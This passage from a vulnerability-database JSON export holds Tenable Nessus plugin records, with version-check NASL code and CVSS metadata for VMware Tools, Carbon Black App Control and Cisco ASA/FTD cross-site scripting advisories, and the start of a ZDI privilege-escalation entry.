script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21998\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:carbon_black_app_control\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"vmware_carbon_black_app_control_win_installed.nbin\", \"vmware_carbon_black_app_control_web_console_detect.nbin\");\n script_require_keys(\"installed_sw/VMware Carbon Black App Control\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_name = 'VMware Carbon Black App Control';\n\n# logic confirm the asset is windows \nvar local_os = get_kb_item('Host/OS');\nvar reg_enum = get_kb_item('SMB/Registry/Enumerated');\nif ((!empty_or_null(local_os) && 'windows' >!< tolower(local_os)) && !reg_enum )\n audit(AUDIT_OS_NOT, 'Windows');\n\nvar app_info = vcf::combined_get_app_info(app:app_name);\n\nif (app_info.version =~ \"^8\\.[10]\\.\" && report_paranoia < 2) \n audit(AUDIT_POTENTIAL_VULN, 'VMware Carbon Black App Control', app_info.version);\n\nvar constraints = [\n { 'min_version' : '8.0', 'fixed_version' : '8.2', 'fixed_display' : 'See vendor advisory for Hotfix' },\n { 'min_version' : '8.5.0.0', 'fixed_version' : '8.5.8.4' },\n { 'min_version' : '8.6.0.0', 'fixed_version' : '8.6.2.26' }\n];\n\nif (app_info.version =~ \"^8\\.[10]\\.\" && report_paranoia < 2) \n audit(AUDIT_POTENTIAL_VULN, 'VMware Carbon Black App Control', app_info.version);\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:08", "description": "The version of VMware Tools installed on the remote Windows host is 11.x prior to 11.2.6. It is, therefore, affected by a local privilege escalation vulnerability. An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as 'openssl.cnf' in an unrestricted directory which would allow code to be executed with elevated privileges.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "VMware Tools 11.x < 11.2.6 Privilege Escalation (VMSA-2021-0013)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21999"], "modified": "2022-05-30T00:00:00", "cpe": ["cpe:/a:vmware:tools"], "id": "VMWARE_TOOLS_WIN_VMSA_2021_0013.NASL", "href": "https://www.tenable.com/plugins/nessus/151285", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151285);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/30\");\n\n script_cve_id(\"CVE-2021-21999\");\n script_xref(name:\"VMSA\", value:\"VMSA-2021-0013\");\n script_xref(name:\"IAVB\", value:\"2021-B-0037-S\");\n\n script_name(english:\"VMware Tools 11.x < 11.2.6 Privilege Escalation (VMSA-2021-0013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization tool suite installed on the remote Windows host is affected by a privilege escalation vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Tools installed on the remote Windows host is 11.x prior to 11.2.6. It is, therefore, affected by\na local privilege escalation vulnerability. An attacker with normal access to a virtual machine may exploit this issue\nby placing a malicious file renamed as 'openssl.cnf' in an unrestricted directory which would allow code to be executed\nwith elevated privileges.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0013.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Tools version 11.2.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:tools\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_tools_installed.nbin\", \"vmware_vsphere_detect.nbin\", \"vmware_esxi_detection.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Tools\", \"Host/ESXi/checked\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nvar app_info = vcf::get_app_info(app:'VMware Tools', win_local:TRUE);\n\nvar constraints = [\n { 'min_version' : '11.0', 'fixed_version' : '11.2.6' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n );\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-09T15:22:34", "description": "The version of Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software running on the remote web server is affected by a cross-site scripting vulnerability. An unauthenticated, remote attacker can exploit this, by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session.\nPlease see the included Cisco BID and Cisco Security Advisory for more information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-07T00:00:00", "type": "nessus", "title": "Cisco ASA Software and FTD Software Web Services Interface XSS (cisco-sa-asaftd-xss-multiple-FCB3vPZe) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/o:cisco:firepower_threat_defense", "cpe:/a:cisco:adaptive_security_appliance_software"], "id": "CISCO_ASA_CVE-2020-3580.NBIN", "href": "https://www.tenable.com/plugins/nessus/151442", "sourceData": "Binary data cisco_asa_cve-2020-3580.nbin", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T14:50:50", "description": "According to its self-reported version, Cisco Firepower Threat Defense Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T00:00:00", "type": "nessus", "title": "Cisco Firepower Threat Defense Software Web Services Interface Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580", "CVE-2020-3581", "CVE-2020-3582", "CVE-2020-3583"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:cisco:firepower_threat_defense"], "id": "CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE.NASL", "href": "https://www.tenable.com/plugins/nessus/150997", "sourceData": "#TRUSTED 98422ab88e852979d4b320aeddc29573dbbc17fcf6f893aff0b31fe8d4c9101264b1b22014e0030ecb3543e75a0e9b35276c4af23a75d478587d6ce6dc3b6bfba5e9626035576059b461570c93deb1e61d174f0f5fe5e5cbb771a611f97db5dca7b71d6d8f71d24e643d0cceef43f26cd88c94d2882f81aa3228afa2695bdfbcc3a56dd44a3641c72ec72ebe132f5802258865b8e0a8868d23756e6ae1c75e3f6839993050f1be7129c878211ab1a27bd9bba9810fc20a7ccbe224d8535b2b7fa2f2cfc375fdd691146246d64b5e21738f2d7fe4d700648df6e17ed48e5a378b18476a7bcc5eac8bb866e3df3eca34d103e3f2aecc75c55e01d4b271e393f1f805553f82f7d1294f8f2fb0a4229d60867f09fa910665812283db48e8374e4da56c846cbcaaba7fc1d309299968ab3d2826ed08d8e50bc1345442249241834cc1d302cf5ff6d3c465a6435eb8aba2892156ae92839c5a05726062a642c918d0be8fe3ac48ba73953849b8502ae38f018c5afce11b8828c843feabd6f392811e840a0f5c61c6a8a5cb5be3ff6c974e4902b000e6647323600360151f2516606fcd442e219374040ff97e0e9ed10432b2af75fb4bfd49706a0e06431190d7ecc80ea541b77f87aa5f176486d6476f8bc319c15fbf9e67e47b5c9d49369197f680cf3642352e5aa5742eb5653ff2f33dffcffa1ec04512bac2451c5bb2c8ac577cf3\n#TRUST-RSA-SHA256 b077016d9227e81ef02d808e78de939a6372fb15361ccddd2f11419450512b3a62f53917bce2813b1cf49b7b2fa901543272bb903cdad82ffeb526634fa586a41224c2654ee094e09f1ace09553a779f1a71f3d735fc8a2076f3313c9faa40537a6f64563ebf16d38024b86b496ad6e6f7b527bf31b54d9ba713465a1314f7c27153e5c8ab4e9d78125254b4ae3b7ee5753ff4fb03e6337489e6d30b3757914f8dbdd93d4ab7032c13ffdf165872f03b7c975f394028ced85aa2da804ee91c306a3b2786b6bcbbd61163e91d6330491f819bdbe7264cdc89ace9970a94045978765806535032291bc855497b9595d7c3ac99c709ed36e388e82687cd4cb25f1d47d940616d71ed6c74bf3f2b79e4e562ffe1e41c472f1143df80aeea7f0f3684b992db79e375b2664aa0d0758f3441d95e060c7120a2d675e724cdaa9b45e435de2e15dd68528eb408ccf66e4e46080ea417f1515523071316a231bcac6a4f7c075dc528ea6bb0c50681b8f781b9e45bd264bc89e5e1463c6a9af435775acd991fe5086298ac295c95f9a0fced431026b8f8cad7e43d138c7289a1987a654532ba709325b5e65085cb29e51590d7a1e3e48a66c668bd192203dc4b149ea09e0217ab9870a5d3014421599e25f9323a9488493273be42a9e6780336175d6341d58670b1ec5318c339eeaf590e3030535c9f6ae1f3c101bed63949b5a64d515124\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150997);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-3580\",\n \"CVE-2020-3581\",\n \"CVE-2020-3582\",\n \"CVE-2020-3583\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu44910\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu75581\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu83309\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvv13835\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvw53796\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-xss-multiple-FCB3vPZe\");\n script_xref(name:\"IAVA\", value:\"2020-A-0488\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0031\");\n\n script_name(english:\"Cisco Firepower Threat Defense Software Web Services Interface Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco Firepower Threat Defense Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f256d96\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu44910\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu75581\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu83309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvv13835\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvw53796\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3583\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Based on vendor advisory\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_enumerate_firepower.nbin\");\n script_require_keys(\"installed_sw/Cisco Firepower Threat Defense\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info, version_list, reporting, workarounds;\n\nproduct_info = cisco::get_product_info(name:'Cisco Firepower Threat Defense');\n\nvuln_ranges = [\n {'min_ver' : '0.0.0', 'fix_ver': '6.4.0.12'},\n {'min_ver' : '6.5.0', 'fix_ver': '6.6.4'},\n {'min_ver' : '6.7.0', 'fix_ver': '6.7.0.2'}\n];\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796',\n 'xss' , TRUE \n);\n\nworkarounds = make_list(CISCO_WORKAROUNDS['IKEv2_enabled'],CISCO_WORKAROUNDS['ssl_vpn'] );\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n workarounds:workarounds,\n vuln_ranges:vuln_ranges\n);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T14:50:50", "description": "According to its self-reported version, Cisco ASA Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T00:00:00", "type": "nessus", "title": "Cisco Adaptive Security Appliance Software Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580", "CVE-2020-3581", "CVE-2020-3582", "CVE-2020-3583"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:adaptive_security_appliance_software"], "id": "CISCO-SA-ASA-XSS-MULTIPLE-FCB3VPZE.NASL", "href": "https://www.tenable.com/plugins/nessus/150996", "sourceData": "#TRUSTED 26113e90d62e153cfdef5b2cf35b5a3580dd0b8580ea1ae95314181b835257bee8c4bf6112a57b70abe30cc1ae1a7959c4c7a899f5dc9f556b702b20b002c2ca1f814d6ffdd253b81425ebef0ea5f04761933f02cbb7880cfa48307d2fb3311cd61eae731a8e5d3e3ead4a0266623aef1469363b366b1840741dda7ed790fee509086391e4f729838da6dff644ae2a50432af245d974c9d2727c240b8f2000a512f2d27210d067b712ad4ef9dde94ae43433f26cde7e5f91d20bc2d6c2b57e6d9c154e99718351b07360d838e6290603f2d7433125ca9cee300056142894d953ed53e5fae0f864b3291826116489618aa2b65bf0223c992c44088a68e77aeefc7aea95f38174f9b7f025ad0b799a80b9d8d34e6ab92bed2af33452b3cc3ff913fc0e4ddbe6b7d66f13fa0bee7fb84829552fab12f14ab7f039fe0aabfd3eaf8114846cd2d6fc8aa8243ea1603330b027a3d83ae6bec8359f64db9c6ca67386db90bcc725bf72375ade298acc8d4d1ba83ad3d3f7435234d08c94496f9053079295fa229433e70f05929bc1485e938490386f978f2827e25353508ed5fcf21153bee4a9cdf9c477c87acbb7eca25463b5afaedb9a715d58d2a1a22a6b02af7a68fcf36e3474016a2cc56ed40b25a71b44ddf016b15b2269375c08cdc8e5e459edbb2f34059730a4e2dac1013927b32fe39097858197ff442ecec15cad4c060d0f\n#TRUST-RSA-SHA256 8ddc66c73a10578192c7db286d020c39ea99348a69e0a250d0541721fb95208107e5f6de812300ab7aae9a9d363e819ca81f59cec2006fdb6f071b03cec8eee2e4c98c64b54c359ceaba230928487971c8ef3774595ea4fe4cab5779733c84139bcf98bdc51a574833f65ad182ee5b5700f1c2d836a95fccf83e537270556b9e0a44e1fb3751096c4ada1ffedac8168005bc1bf07380acd3f42d321602a7acef2eb81c1824e15bdec6d01528ef4b6cf64dd436608a712594c724fd3d3f70f32982b1e602fa550199d26128fbe05ed3ba3e691e1b58d611184bd497dea6f4335704414de45b983ff663477cefc9b11aa399f0230f54698d203c740d3282646f392b4b7447d26566f98810e446f2a6783919182a39a38f8bd952bd09d7563e60ea54ec3f0cab579cb5d3fcddd169ec9a42e6246d8640f23bab37dbbbd201c96ba93543827d69a185e9f0c56b179e5053698c91b234e0b0846b410decbc216110bffeedf094235034f7aca17b5288f746b07fd27fce7ec4f472c0aad8fc824add8362dd5a7f4c1a31d58ada6090b281287b2e1d675bf21c14ecc25b8edb793eec9d71f17604e6301ce398bf9cbc6ee2cb63da0bee39e0967957792d63f43bbaad301741871d6f6a3e3f4532a33c529c9644a858141c529c8321dbbc66f560a972c01d4f98620383277e8934c0e80e68c860f4b9569d996e903cf4fff71e5cec8396\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150996);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-3580\",\n \"CVE-2020-3581\",\n \"CVE-2020-3582\",\n \"CVE-2020-3583\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu44910\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu75581\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu83309\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvv13835\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvw53796\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-xss-multiple-FCB3vPZe\");\n script_xref(name:\"IAVA\", value:\"2020-A-0488\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0031\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software Multiple Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch (cisco-sa-asaftd-xss-multiple-FCB3vPZe)\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco ASA Software is affected by multiple vulnerabilities.\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f256d96\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu44910\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu75581\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu83309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvv13835\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvw53796\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3583\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Cisco/ASA\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\ninclude('cisco_workarounds.inc');\n\nvar product_info, vuln_ranges, workarounds, reporting;\n\nproduct_info = cisco::get_product_info(name:'Cisco Adaptive Security Appliance (ASA) Software');\n\nvuln_ranges = [\n {'min_ver' : '0.0.0', 'fix_ver': '9.8.4.34'},\n {'min_ver' : '9.9.0', 'fix_ver': '9.9.2.85'},\n {'min_ver' : '9.10.0', 'max_ver': '9.10.9999', 'fix_ver': '9.12.4.13'},\n {'min_ver' : '9.12.0', 'fix_ver': '9.12.4.13'},\n {'min_ver' : '9.13.0', 'fix_ver': '9.13.1.21'},\n {'min_ver' : '9.14.0', 'fix_ver': '9.14.2.8'},\n {'min_ver' : '9.15.0', 'fix_ver': '9.15.1.15'}\n ];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['IKEv2_enabled'],CISCO_WORKAROUNDS['ssl_vpn'] );\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvu44910, CSCvu75581, CSCvu83309, CSCvv13835, CSCvw53796',\n 'xss' , TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n workarounds:workarounds,\n vuln_ranges:vuln_ranges\n);\n ", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdi": [{"lastseen": "2022-01-31T22:20:50", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of VMware Workstation. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the VGAuthService service. The issue results from the lack of proper validation of a user-supplied OpenSSL configuration file prior to using it. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "zdi", "title": "VMware Workstation Tools Uncontrolled Search Path Element Local Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, 